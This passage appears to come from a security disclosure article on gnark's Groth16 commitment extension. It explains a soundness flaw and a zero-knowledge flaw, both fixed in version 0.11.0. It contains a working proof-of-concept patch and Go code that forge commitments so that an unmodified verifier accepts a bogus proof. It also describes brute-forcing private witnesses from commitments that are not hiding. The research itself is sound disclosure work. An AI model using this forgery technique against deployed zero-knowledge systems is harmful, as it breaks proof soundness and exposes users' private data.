What does this mean in practice? Say there are $k$ commitments as usual, and the correctly computed points would be $D_1^{\mathrm{correct}}, \dots, D_k^{\mathrm{correct}}$. Then a malicious prover could use $D_1^{\mathrm{fake}}, \dots, D_k^{\mathrm{fake}}$ as commitments, where, for example, all but one of them (say all but $D_k^{\mathrm{fake}}$) are set to $0 \in \mathbb{G}_1$, with the remaining commitment carrying the contributions missing from the others (so $D_k^{\mathrm{fake}} = \sum_{i=1}^{k} D_i^{\mathrm{correct}}$). Now, for $i<k$, the challenge point $\mathcal{H}(D_i^{\mathrm{fake}})$ obtained in-circuit from the commitment to the circuit variables $a_j$ for $j\in \mathcal{J}_i$ no longer depends on the assignments to any circuit variables but stays fixed. For most uses of such challenge points, however, such as compressing checks using the Schwartz-Zippel lemma, the in-circuit logic will no longer be sound if the challenge point is not obtained as a random function of the committed-to circuit variables.

We emphasize that this issue only occurs when more than one commitment is used. The most likely way for a circuit to use commitments is via the range checks from the standard library, which can use them internally if the backend supports commitments. However, commitments for range checks are used via the multicommit package↗, which only creates a single commitment. Thus, circuits using commitments purely through range checks, or otherwise through multicommit, are not vulnerable, as only a single commitment is used.

### Proof of Concept

To demonstrate the issue that we just discussed, we produced a proof of concept. In it, we construct a circuit with two private witnesses, to which we assign random values. We commit to each of the two private witnesses individually, producing two commitments and in-circuit challenges $c_1$ and $c_2$ corresponding to those commitments. We use the fungibility between the commitments to produce a proof with $D_1^{\mathrm{fake}} = 0$ and $D_2^{\mathrm{fake}} = D_1^{\mathrm{correct}} + D_2^{\mathrm{correct}}$. This way, no matter what we assign to the two private witnesses, the first challenge $c_1$ will always be a constant, the hash of the zero point.

As the commitments are calculated in the gnark library (rather than being passed to it as an argument), we need to patch the prover part of gnark to produce our malicious proofs. This is done with the following patch, based on version 0.10.0:

```diff
diff --git a/backend/groth16/bn254/prove.go b/backend/groth16/bn254/prove.go
index 100f30e8..1cf93b96 100644
--- a/backend/groth16/bn254/prove.go
+++ b/backend/groth16/bn254/prove.go
@@ -60,7 +60,7 @@ func (proof *Proof) CurveID() ecc.ID {
 }
 
 // Prove generates the proof of knowledge of a r1cs with full witness (secret + public part).
-func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...backend.ProverOption) (*Proof, error) {
+func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, fakeCommitments []curve.G1Affine, opts ...backend.ProverOption) (*Proof, error) {
 	opt, err := backend.NewProverConfig(opts...)
 	if err != nil {
 		return nil, fmt.Errorf("new prover config: %w", err)
@@ -91,10 +91,7 @@ func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...b
 			privateCommittedValues[i][j].SetBigInt(inJ)
 		}
-		var err error
-		if proof.Commitments[i], err = pk.CommitmentKeys[i].Commit(privateCommittedValues[i]); err != nil {
-			return err
-		}
+		proof.Commitments[i] = fakeCommitments[i]
 		opt.HashToFieldFn.Write(constraint.SerializeCommitment(proof.Commitments[i].Marshal(), hashed, (fr.Bits-1)/8+1))
 		hashBts := opt.HashToFieldFn.Sum(nil)
diff --git a/backend/groth16/groth16.go b/backend/groth16/groth16.go
index ca5b8bdc..36f3d459 100644
--- a/backend/groth16/groth16.go
+++ b/backend/groth16/groth16.go
@@ -179,7 +179,8 @@ func Prove(r1cs constraint.ConstraintSystem, pk ProvingKey, fullWitness witness.
 		if icicle_bn254.HasIcicle {
 			return icicle_bn254.Prove(_r1cs, pk.(*icicle_bn254.ProvingKey), fullWitness, opts...)
 		}
-		return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)
+		panic("changed stuff for poc")
+		//return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)
 	case *cs_bw6761.R1CS:
 		return groth16_bw6761.Prove(_r1cs, pk.(*groth16_bw6761.ProvingKey), fullWitness, opts...)
```

The patch only makes a very small change: the Groth16 prover for the bn254 elliptic curve takes one extra argument, `fakeCommitments`, and instead of calculating the commitments, it just uses the ones that were passed in `fakeCommitments`. Because the signature of the `Prove` function was changed, we also need to fix one other place in the codebase to make it compile (the generic `Prove` function for Groth16, without specializing to concrete types for a specific curve).

By using a patched version of gnark as above, the following code then demonstrates the issue:

```go
package main

import (
	"crypto/sha256"
	"fmt"
	"log"
	"math/big"
	"math/rand"
	"reflect"
	"unsafe"

	"github.com/consensys/gnark-crypto/ecc"
	"github.com/consensys/gnark-crypto/ecc/bn254"
	"github.com/consensys/gnark-crypto/ecc/bn254/fr"
	"github.com/consensys/gnark-crypto/ecc/bn254/fr/hash_to_field"
	fiatshamir "github.com/consensys/gnark-crypto/fiat-shamir"
	"github.com/consensys/gnark/backend"
	"github.com/consensys/gnark/backend/groth16"
	groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
	"github.com/consensys/gnark/constraint"
	cs_bn254 "github.com/consensys/gnark/constraint/bn254"
	"github.com/consensys/gnark/frontend"
	"github.com/consensys/gnark/frontend/cs/r1cs"
)

// Our circuit has two private witnesses.
type Circuit struct {
	A frontend.Variable
	B frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
	commitCompiler, ok := api.Compiler().(frontend.Committer)
	if !ok {
		return fmt.Errorf("compiler does not commit")
	}
	// We commit to both A and B separately, obtaining two challenges.
	challenge_A, err := commitCompiler.Commit(circuit.A)
	if err != nil {
		return err
	}
	challenge_B, err := commitCompiler.Commit(circuit.B)
	if err != nil {
		return err
	}
	// To have some constraints involving the private witnesses and challenges, we constrain them to be nonzero.
	api.AssertIsDifferent(challenge_A, 0)
	api.AssertIsDifferent(challenge_B, 0)
	api.AssertIsDifferent(circuit.A, 0)
	api.AssertIsDifferent(circuit.B, 0)
	// The two challenges should depend on the value assigned to the respective circuit variables
	// in such a way that it is impossible to change the underlying circuit variable's values
	// without the corresponding challenges changing as well.
	// We demonstrate that this does not hold and we can choose the circuit variable being committed to
	// *after* fixing the challenge that should randomly depend on it, by constraining
	// the challenge to be a constant. We will still be able to prove the circuit for
	// any value assigned to the circuit variables.
	var hashOfZero fr.Element
	var hashOfZeroBigInt big.Int
	hashOfZeroBigInt.SetString("14057090015281774264105022686285549399478565317353443989948588114876049265504", 10)
	hashOfZero.SetBigInt(&hashOfZeroBigInt)
	fmt.Println("Constraining the challenge based on the commitment to A to be the hash of zero: ", hashOfZero.String())
	api.AssertIsEqual(challenge_A, hashOfZero)
	return nil
}

func main() {
	// Setup circuit
	var circ Circuit
	ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
	if err != nil {
		panic(err)
	}
	// Assigning some random values.
	A := *big.NewInt(rand.Int63())
	B := *big.NewInt(rand.Int63())
	var w Circuit
	w.A = A
	w.B = B
	fmt.Println("Assigning random value A = ", A.String())
	fmt.Println("Assigning random value B = ", B.String())
	// Running setup, and prover.
	witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
	if err != nil {
		panic(err)
	}
	witnessPublic, err := witness.Public()
	if err != nil {
		panic(err)
	}
	pk, vk, err := groth16.Setup(ccs)
	if err != nil {
		panic(err)
	}
	// Converting proving key to concrete type
	pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
	if !ok {
		log.Fatal("unexpected type for proving key")
	}
	// Construct fake commitment, and associated proof of knowledge.
	// In this case, we make the first commitment zero.
	commitments, commitmentPok := fakeCommitment(*pkConcrete, A, B, *big.NewInt(0), *big.NewInt(0))
	// groth16_bn254.Prove has been modified to use our supplied commitments instead of
	// calculating the legitimate ones.
	fakeProof, err := groth16_bn254.Prove(ccs.(*cs_bn254.R1CS), pkConcrete, witness, commitments)
	if err != nil {
		panic(err)
	}
	// The proof of knowledge for the commitment calculated by groth16_bn254.Prove will not
	// fit our fake commitments, so we replace it with the previously calculated pok.
	fakeProof.CommitmentPok = commitmentPok
	// groth16.Verify has not been modified, yet it accepts our proof with incorrect commitments.
	err = groth16.Verify(fakeProof, vk, witnessPublic)
	if err != nil {
		panic(err)
	}
}

// Constructs fake commitments. Only works for two commitments to one circuit variable each.
// Will fake the first commitment to be FirstCommitmentA*Base[0] + FirstCommitmentB*Base[1]
// instead of the expected AReal*Base[0]. Will also calculate the corresponding proof of knowledge.
func fakeCommitment(pk groth16_bn254.ProvingKey, AReal big.Int, BReal big.Int, FirstCommitmentA big.Int, FirstCommitmentB big.Int) ([]bn254.G1Affine, bn254.G1Affine) {
	expConfig := ecc.MultiExpConfig{
		NbTasks: 1,
	}
	// Casting values to Fr elements
	var ARealFr fr.Element
	var BRealFr fr.Element
	var FirstCommitmentAFr fr.Element
	var FirstCommitmentBFr fr.Element
	ARealFr.SetBigInt(&AReal)
	BRealFr.SetBigInt(&BReal)
	FirstCommitmentAFr.SetBigInt(&FirstCommitmentA)
	FirstCommitmentBFr.SetBigInt(&FirstCommitmentB)
	// Get the commitment key basis elements
	basisPointsA, err := getBasisField(&pk.CommitmentKeys[0])
	if err != nil {
		panic(err)
	}
	basisPointsB, err := getBasisField(&pk.CommitmentKeys[1])
	if err != nil {
		panic(err)
	}
	commitments := make([]bn254.G1Affine, 2)
	exponents := make([]fr.Element, 2)
	// commitments[0] = FCA * Base[0] + FCB * Base[1]
	exponents[0] = FirstCommitmentAFr
	exponents[1] = FirstCommitmentBFr
	commitments[0].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)
	// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]
	exponents[0].Sub(&ARealFr, &FirstCommitmentAFr)
	exponents[1].Sub(&BRealFr, &FirstCommitmentBFr)
	commitments[1].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)
	//commitmentPublicInputs, commitmentsSerialized, err := getCommitmentsHashes(commitments)
	_, commitmentsSerialized, err := getCommitmentsHashes(commitments)
	if err != nil {
		panic(err)
	}
	// The printout below can be used to get the constant we use in the circuit constraints
	//fmt.Println("first commitment public input = ", commitmentPublicInputs[0].String())
	// Get the challenge for commitment folding.
	r, err := getChallenge(commitmentsSerialized)
	if err != nil {
		panic(err)
	}
	// Calculation of the proof of knowledge going along with the commitments:
	// commitments[0] = FCA * Base[0] + FCB * Base[1]
	// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]
	// foldedCommitment = (FCA + r*(A - FCA)) * Base[0] + (FCB + r*(B - FCB)) * Base[1]
	exponents[0].Mul(&exponents[0], &r)
	exponents[0].Add(&exponents[0], &FirstCommitmentAFr)
	exponents[1].Mul(&exponents[1], &r)
	exponents[1].Add(&exponents[1], &FirstCommitmentBFr)
	basisExpSigmaPointsA, err := getBasisExpSigmaField(&pk.CommitmentKeys[0])
	if err != nil {
		panic(err)
	}
	basisExpSigmaPointsB, err := getBasisExpSigmaField(&pk.CommitmentKeys[1])
	if err != nil {
		panic(err)
	}
	var pok bn254.G1Affine
	pok.MultiExp([]bn254.G1Affine{basisExpSigmaPointsA[0], basisExpSigmaPointsB[0]}, exponents, expConfig)
	return commitments, pok
}

// This function calculates the commitment hashes added to the public inputs,
// and calculates the commitmentsSerialized value used for calculating the challenge in commitment folding.
// The code here is mostly copied from gnark's backend/groth16/bn254/verify.go
func getCommitmentsHashes(commitments []bn254.G1Affine) ([]fr.Element, []byte, error) {
	opt, err := backend.NewVerifierConfig()
	if err != nil {
		return nil, nil, fmt.Errorf("new verifier config: %w", err)
	}
	if opt.HashToFieldFn == nil {
		opt.HashToFieldFn = hash_to_field.New([]byte(constraint.CommitmentDst))
	}
	commitmentHashesAsPublicWitnesses := make([]fr.Element, len(commitments))
	commitmentsSerialized := make([]byte, len(commitments)*fr.Bytes)
	commitmentPrehashSerialized := make([]byte, bn254.SizeOfG1AffineUncompressed)
	for i := range len(commitments) {
		copy(commitmentPrehashSerialized, commitments[i].Marshal())
		opt.HashToFieldFn.Write(commitmentPrehashSerialized[:bn254.SizeOfG1AffineUncompressed])
		hashBts := opt.HashToFieldFn.Sum(nil)
		opt.HashToFieldFn.Reset()
		nbBuf := fr.Bytes
		if opt.HashToFieldFn.Size() < fr.Bytes {
			nbBuf = opt.HashToFieldFn.Size()
		}
		var res fr.Element
		res.SetBytes(hashBts[:nbBuf])
		commitmentHashesAsPublicWitnesses[i] = res
		copy(commitmentsSerialized[i*fr.Bytes:], res.Marshal())
	}
	return commitmentHashesAsPublicWitnesses, commitmentsSerialized, nil
}

// copied from gnark-crypto's source code, ecc/bn254/fr/pedersen/pedersen.go
// (it is a private function, so we can't call it)
func getChallenge(fiatshamirSeeds ...[]byte) (r fr.Element, err error) {
	// incorporate user-provided seeds into the transcript
	t := fiatshamir.NewTranscript(sha256.New(), "r")
	for i := range fiatshamirSeeds {
		if err = t.Bind("r", fiatshamirSeeds[i]); err != nil {
			return
		}
	}
	// obtain the challenge
	var rBytes []byte
	if rBytes, err = t.ComputeChallenge("r"); err != nil {
		return
	}
	r.SetBytes(rBytes) // TODO @Tabaie Plonk challenge generation done the same way; replace both with hash to fr?
	return
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
	// Reflect on the pointer
	commitmentPkValue := reflect.ValueOf(commitmentPk)
	if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
		return nil, fmt.Errorf("expected a pointer to a struct")
	}
	// Access the 'basis' field
	basisField := commitmentPkValue.Elem().FieldByName("basis")
	if !basisField.IsValid() {
		return nil, fmt.Errorf("field 'basis' not found")
	}
	if !basisField.CanInterface() {
		// To access an unexported field, we need to bypass safety
		basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
	}
	basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
	if !ok {
		return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
	}
	return basisFieldConcrete, nil
}

// Like getBasisField but for basisExpSigma
func getBasisExpSigmaField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
	// Reflect on the pointer
	commitmentPkValue := reflect.ValueOf(commitmentPk)
	if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
		return nil, fmt.Errorf("expected a pointer to a struct")
	}
	// Access the 'basisExpSigma' field
	basisField := commitmentPkValue.Elem().FieldByName("basisExpSigma")
	if !basisField.IsValid() {
		return nil, fmt.Errorf("field 'basisExpSigma' not found")
	}
	if !basisField.CanInterface() {
		// To access an unexported field, we need to bypass safety
		basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
	}
	basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
	if !ok {
		return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
	}
	return basisFieldConcrete, nil
}
```

Running this program will produce output such as the following:

```
17:16:43 INF compiling circuit
17:16:43 INF parsed circuit inputs nbPublic=0 nbSecret=2
Constraining the challenge based on the commitment to A to be the hash of zero: 14057090015281774264105022686285549399478565317353443989948588114876049265504
17:16:43 INF building constraint builder nbConstraints=5
Assigning random value A = 2593177307956940674
Assigning random value B = 228695105607157038
17:16:43 DBG constraint system solver done nbConstraints=5 took=0.239835
17:16:43 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=5 took=3.831231
17:16:43 DBG verifier done backend=groth16 curve=bn254 took=4.448234
```

The values assigned to the circuit variables `A` and `B` will be fresh, random values each time, but nevertheless, verification passes for a circuit constraining the challenge based on the commitment to circuit variable `A` to be a specific constant.

### The Fix

After we reported the above vulnerability to gnark, the protocol regarding the proof of knowledge associated to the commitments was changed to the variant using $k+1$ pairings that we discussed above. This fix is included starting from version 0.11.0.

## Commitment Schemes

There is a second vulnerability associated to the commitments as used by gnark up to version 0.10.0, related to the proof scheme’s zero-knowledge property.

But before getting into that vulnerability, let us take a step back from the particulars of Groth16 and gnark’s extension to it and discuss what it actually means to talk about commitments. A commitment scheme is a way for a committer to commit to some value in a way that *binds* them to it. The value should be *hidden* from the receiver of the commitment, but the committer should be able to *open* the commitment at some later time, thereby revealing the committed value and convincing the receiver that this was the value they had committed to all along. More precisely, a commitment scheme of the type relevant for us has two main phases as follows:

**Commitment**: The committer runs a commitment algorithm $\mathcal{C}$ that takes as input a value $x$ (from a predefined set) as well as randomness; outputs $\mathcal{C}(x) = (C, d)$, consisting of a commitment $C$ and some extra decommitment information $d$. While $C$ can be published, the committer will keep $d$ for themselves, as this is what they need to open the commitment later. In some cases, $d$ might not be needed.

**Opening**: At some later time, the committer publishes $x$ and $d$. Other parties can now run a verification algorithm $\mathcal{V}$ that takes $((C, d), x)$ as input and either accepts (returns 1) or rejects (returns 0).

The idea is that the verification algorithm should only accept $((C, d), x)$ if $x$ is the value that was used as the input to the commitment algorithm that originally produced $C$. Also, we don’t want it to be possible for anyone to recover $x$ from just $C$. To be a bit more precise, we can define the following properties such a scheme might satisfy:

**Completeness**: The verification algorithm accepts on data produced by the commitment algorithm: $\mathcal{V}(\mathcal{C}(x), x) = 1$.

**Binding**: It is infeasible for an attacker to produce $C, x, x', d, d'$ with $x\neq x'$ so that $\mathcal{V}((C, d), x) = 1$ and $\mathcal{V}((C, d'), x') = 1$. The upshot of this property is that once $C$ is published, the only value the committer can open $C$ to is the one they originally used when computing $C$.

**Hiding**: Given only $C$, an attacker cannot recover the value $x$ committed to via $C$. To be more precise, we could ask for this to be computationally infeasible (computationally hiding), but we could also ask for this to be truly impossible because for any $x$ there exists a $d$ such that $C$ can be opened to $x$, and each $x$ is equally probable as long as the committer chose $d$ to be uniformly random (perfect hiding).

A commitment scheme that is often used is the Pedersen commitment scheme. To introduce it, let $G$ be an abelian group with $p$ elements (with $p$ a prime) and $g_1, \dots, g_n, h$ nonzero elements of $G$. We now describe how we can use Pedersen commitments to commit to a tuple $(x_1, \dots, x_n)$ of elements of $\mathbb{F}_p$.

**Commitment**: Given $(x_1, \dots, x_n)$, a uniformly random element $d\in\mathbb{F}_p$ is sampled. The commitment and decommitment information is then given by $\mathcal{C}(x) = (C, d) = (d \cdot h + \sum_{i=1}^n x_i \cdot g_i, d)$.

**Verification**: The verification algorithm returns 1 if and only if the equality $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ holds.

It is immediate that this scheme is complete as defined above. It is also perfectly hiding. This can be seen as follows: fix $x$ and let $d$ be uniformly random in $\mathbb{F}_p$. Then $d\cdot h$ is uniformly random in $G$ as well: as $h$ is nonzero and $G$ has prime order, $h$ generates $G$, so $d \mapsto d\cdot h$ is a bijection from $\mathbb{F}_p$ to $G$. Similarly, adding a constant is a bijection, so $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ is uniformly random. In particular, the distribution of $C$ is the same no matter what $x$ was, and hence, given $C$, all values for $x$ are equally probable, as long as $d$ was chosen uniformly at random.

How about the binding property? The answer to this depends on the group used. For example, if we used $G = \mathbb{Z}/p\mathbb{Z}$, then this scheme would not be binding at all. Indeed, given a fixed $C$, finding tuples $(x_1, \dots, x_n,d)$ so that $\mathcal{V}((C, d), (x_1, \dots, x_n)) = 1$ amounts to solving the linear equation $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$. This is easily doable; given any $x_1, \dots, x_n$ we can use $d = h^{-1}\cdot \left(C - \sum_{i=1}^n x_i \cdot g_i\right)$.

The problem of solving equations of the form $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ in $G$ for $d, x_1, \dots, x_n$, where $h$ and $g_1, \dots, g_n$ are uniformly random elements of $G$, is called the discrete log (relation) problem. That the discrete log problem is hard for $G$ means that it is computationally intractable to solve such equations. So the Pedersen commitment scheme is computationally binding if the discrete logarithm problem is hard in $G$ and $h, g_1, \dots, g_n$ were chosen as independent, uniformly random elements of $G$. Note that $h, g_1, \dots, g_n$ being independent and uniformly random is necessary, as it is easy to solve the given equation if, for example, $h=g_1=\cdots=g_n$.

## The Zero-Knowledge Vulnerability

Let us now get back to gnark’s extension to Groth16. We will again use the notation from before. As we discussed, the commitments that a gnark Groth16 proof might come with have the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$. The $a_j$ are private witnesses,^{2} and the $L_j$ are points on an elliptic curve for which the discrete logarithm problem is assumed to be hard. But are these commitments $D_i$ binding and hiding? We begin with the binding property and then discuss the failure of the commitments to be hiding. The commitments not being hiding implies that the proving system does not satisfy zero knowledge, and we discuss the practical impact of this. We also discuss how the standard library’s range checks use commitments, and we provide a proof of concept in which private witnesses are recovered from range checks.

### The Binding Property of the Commitments

In this subsection, we consider under which conditions the commitments may have the binding property. By the discussion in the previous section, the commitment will be computationally binding as long as the points $L_j$ are independent uniformly random elements of the elliptic curve.

Before discussing under which conditions this property might hold, let us first point out that, unlike with commitments in general, the commitments of gnark’s Groth16 extension are not intended to be opened. Whether the commitment is binding, as defined above, is thus not directly relevant.

What is more relevant is that $\mathcal{H}(D_i)$ acts as a random function of the assignments of the circuit variables committed to, as this is what is needed to ultimately use the hash of the commitment as a random challenge depending on those variables. If we consider the case of only a single commitment, and $\mathcal{H}$ may be treated as a random function, then this requirement essentially boils down to the points $L_j$ being indistinguishable from independent, uniformly random points from the prover's perspective, and is thus equivalent to the commitment being binding. If there is more than one commitment, then the additional question arises of whether the commitments can be treated separately. This is precisely what the soundness vulnerability discussed above is about.

Getting back to the binding property, the condition that the relevant $L_j$ are independent and uniformly random is not satisfied in general. Roughly, if the coefficients of some circuit variables in constraints always satisfy a linear relation,^{3} then the associated $L_j$ will also satisfy this relation.

To illustrate what we mean by this, suppose we are considering a single commitment $D$ to two circuit variables $x$ and $y$, with $D = x\cdot L_x + y \cdot L_y$. There may be constraints imposed such as $(c\cdot x+d\cdot y) \cdot (2\cdot c\cdot x + 2\cdot d\cdot y) = z$ or $c\cdot x + d\cdot y = 42$. The property to note here is that the coefficient for $y$ in each factor and in the linear term is always the same multiple $\frac{d}{c}$ of the coefficient for $x$. It will then also hold that $L_y = \frac{d}{c}\cdot L_x$, or equivalently $d\cdot L_x = c \cdot L_y$. The upshot of this observation is that the prover knows a relation $d\cdot L_x - c \cdot L_y = 0$, so if they originally committed to $(x, y)$, they may also open the commitment to $(x + r\cdot d, y - r\cdot c)$ for any $r\in \mathbb{F}_p$. Taking the point of view where $\mathcal{H}(D)$ will be used as a random challenge depending on $x$ and $y$: even after learning what the challenge $\mathcal{H}(D)$ will be, the prover still has one degree of freedom to adjust $x$ and $y$. However, this does not actually help a malicious prover. This is because the test being performed using the challenge value (like a Schwartz-Zippel–style equality check) can, by our assumption, only depend on $c\cdot x + d\cdot y$, and this value does not change under the adjustment!

We won’t go into detail why the above holds in general, as this will involve the details of Groth16 and its arithmetization in more depth than we cover in this article. The following example demonstrates the observation in practice, however. In it, we define a circuit with two private witnesses, which we commit together. We add constraints as above and then check that the relation $d\cdot L_x = c \cdot L_y$ indeed holds.

```go
package main

import (
	"fmt"
	"log"
	"math/big"
	"reflect"
	"unsafe"

	"github.com/consensys/gnark-crypto/ecc"
	"github.com/consensys/gnark-crypto/ecc/bn254"
	"github.com/consensys/gnark/backend/groth16"
	groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
	"github.com/consensys/gnark/frontend"
	"github.com/consensys/gnark/frontend/cs/r1cs"
)

const c = 5
const d = 7

type Circuit struct {
	SecretWitnessX frontend.Variable
	SecretWitnessY frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
	commitCompiler, ok := api.Compiler().(frontend.Committer)
	if !ok {
		return fmt.Errorf("compiler does not commit")
	}
	_, err := commitCompiler.Commit(circuit.SecretWitnessX, circuit.SecretWitnessY)
	if err != nil {
		return err
	}
	// We add some constraints where the ratio between the coefficients for Y and X is always d/c.
	sum1 := api.Add(api.Mul(c, circuit.SecretWitnessX), api.Mul(d, circuit.SecretWitnessY))
	sum2 := api.Add(api.Mul(2*c, circuit.SecretWitnessX), api.Mul(2*d, circuit.SecretWitnessY))
	api.Mul(sum1, sum2)
	api.AssertIsEqual(sum1, c*42+d*47)
	return nil
}

func main() {
	// Setup circuit
	var circ Circuit
	ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
	if err != nil {
		panic(err)
	}
	// Assigning some values.
	var w Circuit
	w.SecretWitnessX = 42
	w.SecretWitnessY = 47
	// Running setup and prover.
	witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
	if err != nil {
		panic(err)
	}
	witnessPublic, err := witness.Public()
	if err != nil {
		panic(err)
	}
	pk, vk, err := groth16.Setup(ccs)
	if err != nil {
		panic(err)
	}
	pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
	if !ok {
		log.Fatal("unexpected type for proving key")
	}
	proof, err := groth16.Prove(ccs, pk, witness)
	if err != nil {
		panic(err)
	}
	commitmentPk := &pkConcrete.CommitmentKeys[0]
	basisFieldConcrete, err := getBasisField(commitmentPk)
	if err != nil {
		fmt.Println("Error:", err)
		return
	}
	// Check the linear relation satisfied by the basis elements for the commitments
	scaledBasisX := new(bn254.G1Affine)
	scaledBasisX.ScalarMultiplication(&basisFieldConcrete[0], big.NewInt(d))
	scaledBasisY := new(bn254.G1Affine)
	scaledBasisY.ScalarMultiplication(&basisFieldConcrete[1], big.NewInt(c))
	fmt.Println("d*basis[0] == c*basis[1] :", *scaledBasisX == *scaledBasisY)
	err = groth16.Verify(proof, vk, witnessPublic)
	if err != nil {
		panic(err)
	}
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
	// Reflect on the pointer
	commitmentPkValue := reflect.ValueOf(commitmentPk)
	if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
		return nil, fmt.Errorf("expected a pointer to a struct")
	}
	// Access the 'basis' field
	basisField := commitmentPkValue.Elem().FieldByName("basis")
	if !basisField.IsValid() {
		return nil, fmt.Errorf("field 'basis' not found")
	}
	if !basisField.CanInterface() {
		// To access an unexported field, we need to bypass safety
		basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
	}
	basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
	if !ok {
		return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
	}
	return basisFieldConcrete, nil
}
```

The output will be as follows:

```
13:17:21 INF compiling circuit
13:17:21 INF parsed circuit inputs nbPublic=0 nbSecret=2
13:17:21 INF building constraint builder nbConstraints=2
13:17:21 DBG constraint system solver done nbConstraints=2 took=0.771787
13:17:21 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=2 took=2.421542
d*basis[0] == c*basis[1] : true
13:17:21 DBG verifier done backend=groth16 curve=bn254 took=3.512609
```

We have now described one specific way in which the commitment fails to be binding, or equivalently in which $\mathcal{H}(D_i)$ fails to be a random function of the committed-to circuit variables, but we have also argued why this is not an issue in practice. This raises the question of whether this is the only manner in which the property can fail, so that $\mathcal{H}(D_i)$ otherwise satisfies the security property required for its use as a random challenge in practice. The author expects that this is the case, but we have not attempted to formally define the required property and prove that it holds.

### The Hiding Property of the Commitments

In comparison with the Pedersen commitments discussed before, the commitments used by gnark, being of the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$, lack the blinding summand $d\cdot h$, which is what makes Pedersen commitments perfectly hiding. The commitments used by gnark (before version 0.11.0) were thus not hiding. What does this mean in practice?
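As a compact side-by-side summary (reusing $h$ and $d$ from the earlier discussion of Pedersen commitments, with $h$ an independent generator and $d$ a uniformly random blinding value):

$$
\begin{align*}
\text{Pedersen:}\quad
  C &= \sum_{j} a_j \cdot L_j + d \cdot h
  &&\text{perfectly hiding, since } d \text{ is uniformly random}\\
\text{gnark (before 0.11.0):}\quad
  D_i &= \sum_{j \in \mathcal{J}_i} a_j \cdot L_j
  &&\text{a deterministic function of the } a_j\text{, hence not hiding}
\end{align*}
$$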

Let us consider a single commitment $D = \sum_{i=1}^{k} a_i \cdot L_i$. Suppose the attacker, who has access only to $D$ and the $L_i$, but not to the original $a_i$ used to calculate $D$, makes a guess $a'_i$ for each value $a_i$. The attacker can then verify whether that guess is correct by checking $D \stackrel{?}{=} \sum_{i=1}^k a'_i \cdot L_i$. If equality holds, then either $a_i = a'_i$ for all $1 \leq i \leq k$, or a nontrivial linear relation $\sum_{i=1}^k (a_i - a'_i) \cdot L_i = 0$ has been found, which, by the hardness of the discrete logarithm problem, we assume does not occur in practice as long as $L_1, \dots, L_k$ are independently uniformly random. Hence, in practice (putting aside the exceptions to the binding property discussed in the previous subsection), equality holding implies that the attacker has found the original values used by the prover.

An attacker can thus use $D$ and $L_1, \dots, L_k$ to brute-force the original values of $a_1, \dots, a_k$. If the attacker has no information about what $a_1, \dots, a_k$ might be (in other words, from their perspective, $(a_1, \dots, a_k)$ is a uniformly random element of $\mathbb{F}_p^k$), then this will be infeasible in practice, as the search space will be intractably large. However, if there is only a small number of possibilities for each of $a_1, \dots, a_k$, then searching the entire space may be feasible. For example, $a_i$ might be a leaf in a Merkle tree, with the circuit verifying a Merkle inclusion proof and being intended to protect knowledge of which leaf was used in the proof. If the leaves are publicly known, then it might be feasible for an attacker to verify guesses for each leaf.

The failure of the commitments to be hiding is directly related to the extended Groth16 system’s zero-knowledge property. Zero-knowledge requires that it be impossible to extract any knowledge about the private witnesses from the proof, beyond the fact that the prover knows private witnesses satisfying the circuit’s constraints. The issue just described makes it possible to extract information about those private witnesses that are involved in commitments, violating the zero-knowledge property.

